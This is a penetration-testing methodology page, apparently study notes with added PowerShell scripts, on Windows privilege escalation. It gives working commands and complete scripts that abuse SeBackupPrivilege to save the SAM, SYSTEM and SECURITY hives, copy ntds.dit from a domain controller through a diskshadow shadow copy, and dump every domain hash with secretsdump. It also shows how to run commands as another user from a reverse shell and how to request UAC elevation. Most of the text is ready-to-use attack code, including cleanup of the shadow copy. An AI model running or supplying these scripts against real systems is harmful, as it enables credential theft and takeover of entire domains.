# Methodology

## SeBackupPrivilege

If the current user holds SeBackupPrivilege (check with `whoami /priv`; members of the Backup Operators group get it by default), it can read any file on the system regardless of the file's DACL, as long as the read is done with backup semantics. `reg.exe` and `robocopy /b` do this for you; a plain copy does not. The quickest win is to save the SAM and SYSTEM registry hives, download them to your attacking machine and extract the local Administrator hash with secretsdump.

```cmd
reg save hklm\sam c:\users\username\sam
reg save hklm\system c:\users\username\system
```

Download `sam` and `system` to your Kali machine and run impacket-secretsdump against them offline:

```shell
impacket-secretsdump -sam sam -system system LOCAL
```

<figure><img src="/files/LHwWq2vga41OcuB3NAwX" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/NsyfVw2qgBQi4LHTloa0" alt=""><figcaption></figcaption></figure>
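The same procedure as a PowerShell script, added here as an example (it is not code from the original notes). It checks that the privilege is actually in the token before doing anything, saves the SECURITY hive alongside SAM and SYSTEM so secretsdump can also recover LSA secrets and cached domain logons, and verifies each `reg save` succeeded. The output directory `C:\Users\Public\hives` is a hypothetical writable location; change it to suit the target.

```powershell
# Added example, not from the original notes. Assumes a shell as a user whose token holds
# SeBackupPrivilege (e.g. a Backup Operators member); the output directory is hypothetical.

function Test-SeBackupPrivilege {
    # The privilege only has to be present in the token (Enabled or Disabled):
    # reg.exe and robocopy /b enable it themselves before opening the files.
    $priv = whoami /priv | Select-String -Pattern '^SeBackupPrivilege\b'
    return [bool]$priv
}

function Save-CredentialHives {
    param([string]$OutDir = 'C:\Users\Public\hives')

    if (-not (Test-SeBackupPrivilege)) {
        throw 'SeBackupPrivilege is not in the current token; this method will not work.'
    }
    New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

    # SAM + SYSTEM yield the local account hashes. SECURITY is worth grabbing in the same
    # pass: secretsdump parses LSA secrets (service account passwords, machine account
    # password) and cached domain logons (DCC2) out of it.
    foreach ($hive in 'SAM', 'SYSTEM', 'SECURITY') {
        $dest = Join-Path $OutDir "$hive.save"
        reg save "HKLM\$hive" $dest /y | Out-Null
        if ($LASTEXITCODE -ne 0 -or -not (Test-Path $dest)) {
            throw "reg save HKLM\$hive failed (exit code $LASTEXITCODE)"
        }
    }
    Get-ChildItem $OutDir | Select-Object Name, Length
}

Save-CredentialHives
```

Transfer the three files and run `impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL`; the `-security` hive adds the LSA secrets and cached credentials section to the output.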

### Second Method: SeBackupPrivilege on Domain Controllers

The second method is for domain controllers. The Active Directory database `ntds.dit` only exists there, and it is held open by LSASS while the DC is running, so even with SeBackupPrivilege it cannot be copied directly; it has to be read from a volume shadow copy instead.

Create a file called **test.dsh**

```
set context persistent nowriters
add volume c: alias owo
create
expose %owo% z:
```

<figure><img src="/files/ZLP09nrn4kgdzU6czZqE" alt=""><figcaption></figcaption></figure>

Upload the file to a directory you can write to on the target (diskshadow writes its working files into the current directory), make sure it has Windows (CRLF) line endings, `cd` to that directory and run:

```cmd
diskshadow /s test.dsh

:: the shadow copy of C: is now exposed as Z:; copy ntds.dit out of it in backup mode (/b)
robocopy /b z:\windows\ntds . ntds.dit
```

This leaves a copy of `ntds.dit` in your current working directory.

The hashes inside `ntds.dit` are encrypted with the boot key, which lives in the SYSTEM hive, so save that as well:

```cmd
reg save hklm\system c:\users\username\system
```

Download both files and run impacket-secretsdump with `-ntds`; it prints the NTLM hash of every domain account, including the domain Administrator and krbtgt.

```shell
impacket-secretsdump -ntds ntds.dit -system system LOCAL
```
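The whole shadow-copy procedure as one PowerShell script, added here as an example (not code from the original notes). It writes the diskshadow script with CRLF line endings so the upload-from-Linux problem cannot occur, runs from a writable working directory, checks that the shadow was really exposed and that robocopy succeeded, saves SYSTEM in the same pass, and finally removes the shadow copy so it is not left behind on the DC. The working directory `C:\Users\Public\work` and the alias `owo` are hypothetical.

```powershell
# Added example, not from the original notes. Assumes a shell on a domain controller as a
# user with SeBackupPrivilege (e.g. Backup Operators); paths and the alias are hypothetical.

$work = 'C:\Users\Public\work'
New-Item -ItemType Directory -Path $work -Force | Out-Null
Set-Location $work   # diskshadow writes into the current directory, so it must be writable

# Join with "`r`n" so the .dsh file has Windows line endings regardless of where it was authored.
$shadowScript = @(
    'set context persistent nowriters',
    'add volume c: alias owo',
    'create',
    'expose %owo% z:'
) -join "`r`n"
Set-Content -Path "$work\shadow.dsh" -Value $shadowScript -Encoding ASCII

diskshadow /s "$work\shadow.dsh"
if (-not (Test-Path 'z:\windows\ntds\ntds.dit')) {
    throw 'Shadow copy was not exposed as Z:; check the diskshadow output above.'
}

# /b = backup mode: the file is opened with SeBackupPrivilege, ignoring its DACL.
robocopy /b 'z:\windows\ntds' $work ntds.dit
# robocopy exit codes below 8 mean success (1 = at least one file copied).
if ($LASTEXITCODE -ge 8) { throw "robocopy failed with exit code $LASTEXITCODE" }

# The boot key in SYSTEM decrypts the hashes in ntds.dit; save it from the live registry.
reg save HKLM\SYSTEM "$work\SYSTEM.save" /y | Out-Null
if ($LASTEXITCODE -ne 0) { throw "reg save HKLM\SYSTEM failed (exit code $LASTEXITCODE)" }

# Clean up: delete only the shadow we exposed as Z: ('delete shadows all' would also
# remove every other shadow copy on the host).
Set-Content -Path "$work\cleanup.dsh" -Value 'delete shadows exposed z:' -Encoding ASCII
diskshadow /s "$work\cleanup.dsh"

Get-ChildItem $work | Select-Object Name, Length
```

Download `ntds.dit` and `SYSTEM.save` and run `impacket-secretsdump -ntds ntds.dit -system SYSTEM.save LOCAL` as above.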

## RUNAS (Changing user Sessions)

```cmd
runas /user:Administrator cmd
```

`runas` asks for the account's password on the console and opens the new `cmd` in its own window, so it only works when you know the password and have an interactive session (RDP or console); from a reverse shell without a console the password prompt cannot be answered.
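Two ways to get the same result from PowerShell without the interactive password prompt, added here as an example (not code from the original notes). Both build a `PSCredential` from a known password; the account name, password and output path are hypothetical placeholders.

```powershell
# Added example, not from the original notes. Assumes you already know the target account's
# password; the account, password and output file are hypothetical placeholders.
$password   = ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force
$credential = [pscredential]::new('.\Administrator', $password)   # use DOMAIN\user for a domain account

# Option 1: WinRM loopback. Needs the WinRM service (on by default on Windows Server) and an
# account allowed to use it. Output comes straight back into the current shell. The built-in
# Administrator (RID 500) gets its full token this way; other local admins get a UAC-filtered
# token over the network unless LocalAccountTokenFilterPolicy is set to 1.
Invoke-Command -ComputerName localhost -Credential $credential -ScriptBlock {
    whoami
    whoami /groups | Select-String 'Mandatory Level'
}

# Option 2: no WinRM. Start-Process -Credential performs the same secondary logon as runas
# (the Secondary Logon service must be running) but takes the password from the credential
# object instead of prompting, so it works from a non-interactive reverse shell. The child
# process has no console you can see, so redirect its output to a file and read that back.
$out = 'C:\Users\Public\runas_check.txt'
Start-Process -FilePath 'cmd.exe' -Credential $credential -WorkingDirectory 'C:\Windows\System32' `
    -ArgumentList "/c whoami /all > $out"
Start-Sleep -Seconds 2
Get-Content $out
```

Option 2 is the one to reach for from a bare reverse shell: replace the `whoami` in the argument list with your payload (for example a second reverse shell) to get a shell as the target user.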

## Bypassing UAC

If your user is a member of the local Administrators group but the shell is running with the filtered, medium-integrity token that UAC hands out, you can request the full token from a PowerShell prompt inside an RDP session. This is not a real bypass: `-Verb RunAs` triggers the UAC consent prompt, and you click Yes on the RDP desktop. From a non-interactive reverse shell there is nobody to click, so the prompt is never answered.

```powershell
Start-Process cmd.exe -Verb RunAs   # opens a new cmd.exe with the elevated (high-integrity) token
```

In the new window, `whoami /groups | findstr /i mandatory` should now show `High Mandatory Level` instead of `Medium`.
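An added PowerShell example (not code from the original notes) that shows how to tell whether the current process is already elevated before asking for the prompt, and re-runs the check in the elevated window so the change in integrity level is visible. It assumes an interactive (RDP or console) PowerShell session as a member of the local Administrators group.

```powershell
# Added example, not from the original notes. Assumes an interactive PowerShell session
# (RDP/console) as a member of the local Administrators group.

function Get-IntegrityLevel {
    # The token's integrity label: "Medium" for a UAC-filtered admin, "High" once elevated.
    $text = (whoami /groups) -join "`n"
    if ($text -match '(\w+) Mandatory Level') { return $Matches[1] }
    return 'Unknown'
}

function Test-IsElevated {
    # In a UAC-filtered token the Administrators SID is marked deny-only, so IsInRole
    # returns $false until the process is actually running with the full token.
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = [Security.Principal.WindowsPrincipal]::new($identity)
    return $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

"Integrity level: $(Get-IntegrityLevel)   Elevated: $(Test-IsElevated)"

if (-not (Test-IsElevated)) {
    # -Verb RunAs asks for the full token through the UAC consent prompt. Someone has to
    # click Yes on the interactive desktop, which is why this works over RDP or the console
    # but never from a reverse shell. -NoExit keeps the elevated window open so the output
    # of the checks can be read.
    $argList = @('-NoExit', '-Command', 'whoami /groups | findstr /i mandatory; whoami /priv')
    Start-Process -FilePath 'powershell.exe' -Verb RunAs -ArgumentList $argList
}
```

The first line of output in the original session reads `Medium` / `False` for a filtered admin; the elevated window lists `High Mandatory Level` and a much longer `whoami /priv` table (SeDebugPrivilege, SeImpersonatePrivilege and the rest only appear in the full token).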
